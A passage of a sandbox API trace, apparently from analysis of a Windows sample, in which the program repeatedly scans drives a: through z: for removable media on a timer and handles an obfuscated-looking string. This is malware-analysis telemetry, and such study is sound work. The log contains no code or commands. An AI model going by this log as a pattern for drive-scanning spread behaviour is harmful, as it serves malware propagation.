hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.702] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.702] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.702] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0216.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.702] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0216.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0216.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0216.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0216.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0216.703] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.703] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.703] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.706] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.706] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.706] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.706] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.707] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.707] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.707] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.707] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.707] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.708] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.708] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.708] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.708] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.708] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.709] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.709] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.709] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.709] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.709] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.710] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.710] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.710] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.710] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.710] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0216.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0216.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0216.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.711] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.711] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.711] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.712] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0216.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0216.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0216.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0216.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0216.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0216.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0216.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.713] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.713] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0216.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.713] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.714] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0216.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0216.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.714] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.714] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.714] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.715] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.715] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.715] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.715] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.716] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.716] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.716] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.716] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.716] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.717] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.717] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.717] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.717] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.717] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.717] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.718] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.718] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.718] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.718] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.718] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.719] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.719] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.719] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.719] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0216.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.720] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.720] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.720] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.720] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.720] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.721] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0216.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0216.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326120 [0216.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326120 | out: hHeap=0x12c0000) returned 1 [0216.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0216.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0216.721] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0216.722] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0216.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0216.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.722] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.722] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0216.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.723] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0216.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0216.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0216.723] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0216.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0216.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0216.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0216.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0216.724] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.724] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.724] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.724] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.724] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.724] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.725] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.725] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.725] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.725] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.726] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.726] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.726] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.726] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.726] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.727] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.727] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.727] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.727] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.727] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.728] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.728] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.728] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.728] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.728] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.729] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.729] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0216.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0216.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0216.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0216.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.730] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0216.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0216.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0216.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0216.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0216.730] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.730] 